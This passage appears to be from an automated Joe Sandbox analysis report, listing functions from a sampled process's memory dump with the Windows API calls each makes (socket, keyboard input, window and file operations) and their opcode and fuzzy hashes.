                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00A9255A
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00A92568
                                                                                                                                                                                                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00A925E7
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00A925F1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 67596d235a31ab019b1502ef7e5d3e5ac304270e398225efc6eda07b36a0a678
                                                                                                                                                                                                                                                                                                    • Instruction ID: b4d4f51d8561dd2a3368071599a3200046b0fe27b22fba5c77a5dafb870575de
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 67596d235a31ab019b1502ef7e5d3e5ac304270e398225efc6eda07b36a0a678
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B641D234B00200AFE720AF24C886F6A77E4EB58714F54C458F9568F6D2C775ED428B90
                                                                                                                                                                                                                                                                                                    Function 00AA6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00AA6D1A
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00AA6D4D
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00AA6DBA
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2bf1831697f346df41043b25b9eaf9bf4da238db7f43cb19bf25e410420818a9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 76fd88d653f35075a9e6f4bf29b40d2e3c403845734bf6e3dbf769e559de517d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2bf1831697f346df41043b25b9eaf9bf4da238db7f43cb19bf25e410420818a9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E512974A00609EFCF24DF64D880AAE7BB6FB46360F248159F9659B2D0DB30AD81CF50
                                                                                                                                                                                                                                                                                                    Function 00A4B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                    • Opcode ID: fc17056b3319235f3d5f072fd00ecf14fa862fba8c47de72bb3025c3d3d0a5af
                                                                                                                                                                                                                                                                                                    • Instruction ID: 150e0200b22923dafc9d2bdffe742bcd92623e6e2adf0dfe788936c81a2893c4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc17056b3319235f3d5f072fd00ecf14fa862fba8c47de72bb3025c3d3d0a5af
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92411679A10704AFD725AF78CD42BAABBEDEFC8710F10852AF111DB291D771D91187A0
                                                                                                                                                                                                                                                                                                    Function 00A8611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00A861C8
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00A861EE
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00A86213
                                                                                                                                                                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00A8623F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: cf252bf8cc0f66e0232b0ffc23ebe077e6e346c7f02fe0ca540fb61e7a73a642
                                                                                                                                                                                                                                                                                                    • Instruction ID: b1c19ada86b775e193c28394e870200b96eb1c38b79aa0bb46f2ab6fdfa49cd5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf252bf8cc0f66e0232b0ffc23ebe077e6e346c7f02fe0ca540fb61e7a73a642
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5414E35600611DFCB11EF54C645A9DBBE2FF8A710B188488E84A9B3A2CB34FD41CB91
                                                                                                                                                                                                                                                                                                    Function 00A7B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00A7B473
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(00000080), ref: 00A7B48F
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00A7B4FD
                                                                                                                                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00A7B54F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9316ec83bdfba6215869e1fa0b734d970b6c395bbb63600af8d13729a7234cdd
                                                                                                                                                                                                                                                                                                    • Instruction ID: 9eecd953d73f56b44de25264e78f9ba88ae9ad3b64d119c86507d813125b869c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9316ec83bdfba6215869e1fa0b734d970b6c395bbb63600af8d13729a7234cdd
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D83108B0A602086EFF30CB658C05BFA7BB5AB59310F08C21AF49B961D2C37589458775
                                                                                                                                                                                                                                                                                                    Function 00A7B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00A7B5B8
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00A7B5D4
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00A7B63B
                                                                                                                                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00A7B68D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1ebf09e516eb2c6a0d0a27b390f2222bd7390ea4ebd8e31f241b26e75bc3b544
                                                                                                                                                                                                                                                                                                    • Instruction ID: 42c0c83606c0e17ac8f5839541a421596cb71c7eace3b4579a54cff3a771f3df
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ebf09e516eb2c6a0d0a27b390f2222bd7390ea4ebd8e31f241b26e75bc3b544
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40313CB0A606086EFF30CB648C057FEBBB6AF95310F04C22AE589561D1D3748A468BB5
                                                                                                                                                                                                                                                                                                    Function 00AA80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ClientToScreen.USER32(?,?), ref: 00AA80D4
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00AA814A
                                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00AA815A
                                                                                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00AA81C6
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 20fa3126cb22413088b73a8417aeac28a0596a25645ed43fc3dea3fb16265d60
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5db68d7ceda52c04352bfe1c99cd6373ffa5d4c54ae0e323c1f3c6a37d477258
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20fa3126cb22413088b73a8417aeac28a0596a25645ed43fc3dea3fb16265d60
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E417E30A01215DFCB16CF98C884AA9B7F5FF46314F1442A8E9559B2E1CB79E883CB90
                                                                                                                                                                                                                                                                                                    Function 00AA2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00AA2187
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A743AD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74393: GetCurrentThreadId.KERNEL32 ref: 00A743B4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A72F00), ref: 00A743BB
                                                                                                                                                                                                                                                                                                    • GetCaretPos.USER32(?), ref: 00AA219B
                                                                                                                                                                                                                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00AA21E8
                                                                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00AA21EE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2e25250321e424e90ce9f7a1132e3a08265c8d9627558591c56c15085e6f218d
                                                                                                                                                                                                                                                                                                    • Instruction ID: ea5e76a01e8624d63370d2d1c4ae2b376b1b56700f1d90c07d52cf0717b4cf6d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e25250321e424e90ce9f7a1132e3a08265c8d9627558591c56c15085e6f218d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48317271D00209AFC704DFA9C9C1DEEB7F8EF89304B54806AE415E7251DB359E45CBA0
                                                                                                                                                                                                                                                                                                    Function 00A7E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A141EA: _wcslen.LIBCMT ref: 00A141EF
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7E8E2
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7E8F9
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7E924
                                                                                                                                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00A7E92F
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4217d6d1759c6863b0b523587d21181fe1509af1b6d62142e200d41cbe561bd4
                                                                                                                                                                                                                                                                                                    • Instruction ID: d57c017092ab86d084b56b80e17e94bfd9b51d9122927fee5c0a71b37ff89ee1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4217d6d1759c6863b0b523587d21181fe1509af1b6d62142e200d41cbe561bd4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB219472900214EFCB11EFA8DA81BAEB7B8AF49350F1480A4F908AB241D6709E41C7A1
                                                                                                                                                                                                                                                                                                    Function 00AA9A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00AA9A5D
                                                                                                                                                                                                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AA9A72
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00AA9ABA
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00AA9AF0
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c8c838b6d9febf7871025a3652c11c669fbe908461adc467a30c71d3dd78cadc
                                                                                                                                                                                                                                                                                                    • Instruction ID: 63bfe25302019b1f1b78c40cbd95f45987b9f1bccd43f2c1164b6dc77d946ac1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8c838b6d9febf7871025a3652c11c669fbe908461adc467a30c71d3dd78cadc
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1219A35600018AFCF25CF94C888FEB7BB9EB4A390F40416AF90A8B1A1D7719952DB60
                                                                                                                                                                                                                                                                                                    Function 00A7DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,00AADC30), ref: 00A7DBA6
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A7DBB5
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A7DBC4
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00AADC30), ref: 00A7DC21
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a47541a011a8d7db7b35ac5bbcdec0a30126809410c3abfb0bd4063230d017a9
                                                                                                                                                                                                                                                                                                    • Instruction ID: f872d22521c970250431ab4be29eaeac1e6e8b03b73fcd4e2979df7568ea08ac
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a47541a011a8d7db7b35ac5bbcdec0a30126809410c3abfb0bd4063230d017a9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F2181705082059F8700DF38CD819ABBBF8EE9A364F108A19F499C72E1DB31D94ACB52
                                                                                                                                                                                                                                                                                                    Function 00AA321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00AA32A6
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AA32C0
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AA32CE
                                                                                                                                                                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00AA32DC
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
